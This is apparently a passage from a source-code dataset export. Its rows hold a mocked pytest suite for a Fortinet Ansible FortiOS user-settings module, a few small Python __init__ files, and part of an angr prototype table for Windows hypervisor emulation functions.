] | 32 | 2018-10-09T04:13:42.000Z | 2020-05-11T07:20:28.000Z | v6.0.5/user/test_fortios_user_setting.py | fortinet-solutions-cse/ansible_fgt_modules | c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719 | [
"Apache-2.0"
] | 11 | 2018-10-09T00:14:53.000Z | 2021-11-03T10:54:09.000Z | # Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_user_setting
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_user_setting.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_user_setting_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_setting': {
'auth_blackout_time': '3',
'auth_ca_cert': 'test_value_4',
'auth_cert': 'test_value_5',
'auth_http_basic': 'enable',
'auth_invalid_max': '7',
'auth_lockout_duration': '8',
'auth_lockout_threshold': '9',
'auth_portal_timeout': '10',
'auth_secure_http': 'enable',
'auth_src_mac': 'enable',
'auth_ssl_allow_renegotiation': 'enable',
'auth_timeout': '14',
'auth_timeout_type': 'idle-timeout',
'auth_type': 'http',
'radius_ses_timeout_act': 'hard-timeout'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_setting.fortios_user(input_data, fos_instance)
expected_data = {
'auth-blackout-time': '3',
'auth-ca-cert': 'test_value_4',
'auth-cert': 'test_value_5',
'auth-http-basic': 'enable',
'auth-invalid-max': '7',
'auth-lockout-duration': '8',
'auth-lockout-threshold': '9',
'auth-portal-timeout': '10',
'auth-secure-http': 'enable',
'auth-src-mac': 'enable',
'auth-ssl-allow-renegotiation': 'enable',
'auth-timeout': '14',
'auth-timeout-type': 'idle-timeout',
'auth-type': 'http',
'radius-ses-timeout-act': 'hard-timeout'
}
set_method_mock.assert_called_with('user', 'setting', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_setting_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_setting': {
'auth_blackout_time': '3',
'auth_ca_cert': 'test_value_4',
'auth_cert': 'test_value_5',
'auth_http_basic': 'enable',
'auth_invalid_max': '7',
'auth_lockout_duration': '8',
'auth_lockout_threshold': '9',
'auth_portal_timeout': '10',
'auth_secure_http': 'enable',
'auth_src_mac': 'enable',
'auth_ssl_allow_renegotiation': 'enable',
'auth_timeout': '14',
'auth_timeout_type': 'idle-timeout',
'auth_type': 'http',
'radius_ses_timeout_act': 'hard-timeout'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_setting.fortios_user(input_data, fos_instance)
expected_data = {
'auth-blackout-time': '3',
'auth-ca-cert': 'test_value_4',
'auth-cert': 'test_value_5',
'auth-http-basic': 'enable',
'auth-invalid-max': '7',
'auth-lockout-duration': '8',
'auth-lockout-threshold': '9',
'auth-portal-timeout': '10',
'auth-secure-http': 'enable',
'auth-src-mac': 'enable',
'auth-ssl-allow-renegotiation': 'enable',
'auth-timeout': '14',
'auth-timeout-type': 'idle-timeout',
'auth-type': 'http',
'radius-ses-timeout-act': 'hard-timeout'
}
set_method_mock.assert_called_with('user', 'setting', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_setting_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_setting': {
'auth_blackout_time': '3',
'auth_ca_cert': 'test_value_4',
'auth_cert': 'test_value_5',
'auth_http_basic': 'enable',
'auth_invalid_max': '7',
'auth_lockout_duration': '8',
'auth_lockout_threshold': '9',
'auth_portal_timeout': '10',
'auth_secure_http': 'enable',
'auth_src_mac': 'enable',
'auth_ssl_allow_renegotiation': 'enable',
'auth_timeout': '14',
'auth_timeout_type': 'idle-timeout',
'auth_type': 'http',
'radius_ses_timeout_act': 'hard-timeout'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_setting.fortios_user(input_data, fos_instance)
expected_data = {
'auth-blackout-time': '3',
'auth-ca-cert': 'test_value_4',
'auth-cert': 'test_value_5',
'auth-http-basic': 'enable',
'auth-invalid-max': '7',
'auth-lockout-duration': '8',
'auth-lockout-threshold': '9',
'auth-portal-timeout': '10',
'auth-secure-http': 'enable',
'auth-src-mac': 'enable',
'auth-ssl-allow-renegotiation': 'enable',
'auth-timeout': '14',
'auth-timeout-type': 'idle-timeout',
'auth-type': 'http',
'radius-ses-timeout-act': 'hard-timeout'
}
set_method_mock.assert_called_with('user', 'setting', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_user_setting_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_setting': {
'random_attribute_not_valid': 'tag',
'auth_blackout_time': '3',
'auth_ca_cert': 'test_value_4',
'auth_cert': 'test_value_5',
'auth_http_basic': 'enable',
'auth_invalid_max': '7',
'auth_lockout_duration': '8',
'auth_lockout_threshold': '9',
'auth_portal_timeout': '10',
'auth_secure_http': 'enable',
'auth_src_mac': 'enable',
'auth_ssl_allow_renegotiation': 'enable',
'auth_timeout': '14',
'auth_timeout_type': 'idle-timeout',
'auth_type': 'http',
'radius_ses_timeout_act': 'hard-timeout'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_setting.fortios_user(input_data, fos_instance)
expected_data = {
'auth-blackout-time': '3',
'auth-ca-cert': 'test_value_4',
'auth-cert': 'test_value_5',
'auth-http-basic': 'enable',
'auth-invalid-max': '7',
'auth-lockout-duration': '8',
'auth-lockout-threshold': '9',
'auth-portal-timeout': '10',
'auth-secure-http': 'enable',
'auth-src-mac': 'enable',
'auth-ssl-allow-renegotiation': 'enable',
'auth-timeout': '14',
'auth-timeout-type': 'idle-timeout',
'auth-type': 'http',
'radius-ses-timeout-act': 'hard-timeout'
}
set_method_mock.assert_called_with('user', 'setting', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| 37.212121 | 133 | 0.627036 | 1,153 | 9,824 | 5.063313 | 0.160451 | 0.054813 | 0.035629 | 0.038541 | 0.819801 | 0.804042 | 0.78777 | 0.78777 | 0.78777 | 0.78777 | 0 | 0.01457 | 0.231474 | 9,824 | 263 | 134 | 37.353612 | 0.758676 | 0.06759 | 0 | 0.840376 | 0 | 0 | 0.414808 | 0.147528 | 0 | 0 | 0 | 0 | 0.112676 | 1 | 0.023474 | false | 0 | 0.037559 | 0 | 0.065728 | 0.004695 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
058a99f0f0c18bec63b4315725aca5cd255ff2f4 | 148 | py | Python | rat-sql-gap/seq2struct/models/sparc/__init__.py | JuruoMP/Text2SQL-Multiturn | 1c7d1a93d638650a63959327a07c804d1d013e0e | [
"Apache-2.0"
] | null | null | null | rat-sql-gap/seq2struct/models/sparc/__init__.py | JuruoMP/Text2SQL-Multiturn | 1c7d1a93d638650a63959327a07c804d1d013e0e | [
"Apache-2.0"
] | null | null | null | rat-sql-gap/seq2struct/models/sparc/__init__.py | JuruoMP/Text2SQL-Multiturn | 1c7d1a93d638650a63959327a07c804d1d013e0e | [
"Apache-2.0"
] | null | null | null | from . import sparc_dec_func
from . import sparc_beam_search
from . import sparc_enc_modules
from . import sparc_enc
from . import sparc_match_utils | 29.6 | 31 | 0.837838 | 24 | 148 | 4.791667 | 0.458333 | 0.434783 | 0.652174 | 0.313043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128378 | 148 | 5 | 32 | 29.6 | 0.891473 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
05911e43287fdf4f500027aa0ee73b7c7c9f3cc8 | 70 | py | Python | app/controller/__init__.py | unbyte/we-are-fine | 141eb3fa2deb220ccd5e2f98bf34cf234619b8b2 | [
"MIT"
] | 4 | 2020-03-22T05:37:21.000Z | 2020-03-25T01:50:36.000Z | app/controller/__init__.py | unbyte/we-are-fine | 141eb3fa2deb220ccd5e2f98bf34cf234619b8b2 | [
"MIT"
] | 1 | 2020-04-15T14:35:19.000Z | 2020-04-17T05:18:35.000Z | app/controller/__init__.py | unbyte/we-are-fine | 141eb3fa2deb220ccd5e2f98bf34cf234619b8b2 | [
"MIT"
] | null | null | null | from .record import *
from .user import *
def initialize():
pass
| 11.666667 | 21 | 0.671429 | 9 | 70 | 5.222222 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228571 | 70 | 5 | 22 | 14 | 0.87037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
553f8a2c86a1edb3bfe51d1c4772edd2c6de8d4f | 109 | py | Python | ax_get/__init__.py | TechPowerAwaits/ax-get | 5eece2cecf99d2b6d2d8f248badb98007c76919e | [
"0BSD"
] | null | null | null | ax_get/__init__.py | TechPowerAwaits/ax-get | 5eece2cecf99d2b6d2d8f248badb98007c76919e | [
"0BSD"
] | 2 | 2021-08-15T04:01:49.000Z | 2022-01-05T23:13:45.000Z | ax_get/__init__.py | TechPowerAwaits/ax-get | 5eece2cecf99d2b6d2d8f248badb98007c76919e | [
"0BSD"
] | null | null | null | import ax_get.posix_compat as posix_compat
import ax_get.script as script
import ax_get.tmp_name as tmp_name
| 27.25 | 42 | 0.862385 | 22 | 109 | 3.954545 | 0.409091 | 0.275862 | 0.37931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110092 | 109 | 3 | 43 | 36.333333 | 0.896907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
557d699181911a986ee5dbc4f98699694cbf7420 | 22,445 | py | Python | angr/procedures/definitions/win32_winhvemulation.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_winhvemulation.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_winhvemulation.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | # pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("winhvemulation.dll")
prototypes = \
{
#
'WHvEmulatorCreateEmulator': SimTypeFunction([SimTypePointer(SimStruct({"Size": SimTypeInt(signed=False, label="UInt32"), "Reserved": SimTypeInt(signed=False, label="UInt32"), "WHvEmulatorIoPortCallback": SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimStruct({"Direction": SimTypeChar(label="Byte"), "Port": SimTypeShort(signed=False, label="UInt16"), "AccessSize": SimTypeShort(signed=False, label="UInt16"), "Data": SimTypeInt(signed=False, label="UInt32")}, name="WHV_EMULATOR_IO_ACCESS_INFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Context", "IoAccess"]), offset=0), "WHvEmulatorMemoryCallback": SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimStruct({"GpaAddress": SimTypeLongLong(signed=False, label="UInt64"), "Direction": SimTypeChar(label="Byte"), "AccessSize": SimTypeChar(label="Byte"), "Data": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 8)}, name="WHV_EMULATOR_MEMORY_ACCESS_INFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Context", "MemoryAccess"]), offset=0), "WHvEmulatorGetVirtualProcessorRegisters": SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="WHV_REGISTER_NAME"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimUnion({"Reg128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None"), "Reg64": SimTypeLongLong(signed=False, label="UInt64"), "Reg32": SimTypeInt(signed=False, label="UInt32"), "Reg16": SimTypeShort(signed=False, label="UInt16"), "Reg8": SimTypeChar(label="Byte"), "Fp": SimUnion({"Anonymous": SimStruct({"Mantissa": SimTypeLongLong(signed=False, label="UInt64"), "_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "FpControlStatus": SimUnion({"Anonymous": SimStruct({"FpControl": SimTypeShort(signed=False, label="UInt16"), "FpStatus": SimTypeShort(signed=False, label="UInt16"), "FpTag": SimTypeChar(label="Byte"), "Reserved": SimTypeChar(label="Byte"), "LastFpOp": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"LastFpRip": SimTypeLongLong(signed=False, label="UInt64"), "Anonymous": SimStruct({"LastFpEip": SimTypeInt(signed=False, label="UInt32"), "LastFpCs": SimTypeShort(signed=False, label="UInt16"), "Reserved2": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None)}, name="<anon>", label="None")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "XmmControlStatus": SimUnion({"Anonymous": SimStruct({"Anonymous": SimUnion({"LastFpRdp": SimTypeLongLong(signed=False, label="UInt64"), "Anonymous": SimStruct({"LastFpDp": SimTypeInt(signed=False, label="UInt32"), "LastFpDs": SimTypeShort(signed=False, label="UInt16"), "Reserved": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None)}, name="<anon>", label="None"), "XmmStatusControl": SimTypeInt(signed=False, label="UInt32"), "XmmStatusControlMask": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "Segment": SimStruct({"Base": SimTypeLongLong(signed=False, label="UInt64"), "Limit": SimTypeInt(signed=False, label="UInt32"), "Selector": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "Attributes": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None")}, name="WHV_X64_SEGMENT_REGISTER", pack=False, align=None), "Table": SimStruct({"Pad": SimTypeFixedSizeArray(SimTypeShort(signed=False, label="UInt16"), 3), "Limit": SimTypeShort(signed=False, label="UInt16"), "Base": SimTypeLongLong(signed=False, label="UInt64")}, name="WHV_X64_TABLE_REGISTER", pack=False, align=None), "InterruptState": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "PendingInterruption": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32"), "ErrorCode": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "DeliverabilityNotifications": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "ExceptionEvent": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32"), "ErrorCode": SimTypeInt(signed=False, label="UInt32"), "ExceptionParameter": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "ExtIntEvent": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64"), "Reserved2": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "InternalActivity": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "PendingDebugException": SimUnion({"AsUINT64": SimTypeLongLong(signed=False, label="UInt64"), "Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None)}, name="<anon>", label="None")}, name="<anon>", label="None"), label="LPArray", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Context", "RegisterNames", "RegisterCount", "RegisterValues"]), offset=0), "WHvEmulatorSetVirtualProcessorRegisters": SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="WHV_REGISTER_NAME"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimUnion({"Reg128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None"), "Reg64": SimTypeLongLong(signed=False, label="UInt64"), "Reg32": SimTypeInt(signed=False, label="UInt32"), "Reg16": SimTypeShort(signed=False, label="UInt16"), "Reg8": SimTypeChar(label="Byte"), "Fp": SimUnion({"Anonymous": SimStruct({"Mantissa": SimTypeLongLong(signed=False, label="UInt64"), "_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "FpControlStatus": SimUnion({"Anonymous": SimStruct({"FpControl": SimTypeShort(signed=False, label="UInt16"), "FpStatus": SimTypeShort(signed=False, label="UInt16"), "FpTag": SimTypeChar(label="Byte"), "Reserved": SimTypeChar(label="Byte"), "LastFpOp": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"LastFpRip": SimTypeLongLong(signed=False, label="UInt64"), "Anonymous": SimStruct({"LastFpEip": SimTypeInt(signed=False, label="UInt32"), "LastFpCs": SimTypeShort(signed=False, label="UInt16"), "Reserved2": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None)}, name="<anon>", label="None")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "XmmControlStatus": SimUnion({"Anonymous": SimStruct({"Anonymous": SimUnion({"LastFpRdp": SimTypeLongLong(signed=False, label="UInt64"), "Anonymous": SimStruct({"LastFpDp": SimTypeInt(signed=False, label="UInt32"), "LastFpDs": SimTypeShort(signed=False, label="UInt16"), "Reserved": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None)}, name="<anon>", label="None"), "XmmStatusControl": SimTypeInt(signed=False, label="UInt32"), "XmmStatusControlMask": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "Segment": SimStruct({"Base": SimTypeLongLong(signed=False, label="UInt64"), "Limit": SimTypeInt(signed=False, label="UInt32"), "Selector": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeShort(signed=False, label="UInt16")}, name="_Anonymous_e__Struct", pack=False, align=None), "Attributes": SimTypeShort(signed=False, label="UInt16")}, name="<anon>", label="None")}, name="WHV_X64_SEGMENT_REGISTER", pack=False, align=None), "Table": SimStruct({"Pad": SimTypeFixedSizeArray(SimTypeShort(signed=False, label="UInt16"), 3), "Limit": SimTypeShort(signed=False, label="UInt16"), "Base": SimTypeLongLong(signed=False, label="UInt64")}, name="WHV_X64_TABLE_REGISTER", pack=False, align=None), "InterruptState": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "PendingInterruption": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32"), "ErrorCode": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "DeliverabilityNotifications": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "ExceptionEvent": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeInt(signed=False, label="UInt32"), "ErrorCode": SimTypeInt(signed=False, label="UInt32"), "ExceptionParameter": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "ExtIntEvent": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64"), "Reserved2": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None")}, name="<anon>", label="None"), "InternalActivity": SimUnion({"Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "AsUINT64": SimTypeLongLong(signed=False, label="UInt64")}, name="<anon>", label="None"), "PendingDebugException": SimUnion({"AsUINT64": SimTypeLongLong(signed=False, label="UInt64"), "Anonymous": SimStruct({"_bitfield": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None)}, name="<anon>", label="None")}, name="<anon>", label="None"), label="LPArray", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Context", "RegisterNames", "RegisterCount", "RegisterValues"]), offset=0), "WHvEmulatorTranslateGvaPage": SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeLongLong(signed=False, label="UInt64"), SimTypeInt(signed=False, label="WHV_TRANSLATE_GVA_FLAGS"), SimTypePointer(SimTypeInt(signed=False, label="WHV_TRANSLATE_GVA_RESULT_CODE"), offset=0), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Context", "Gva", "TranslateFlags", "TranslationResult", "Gpa"]), 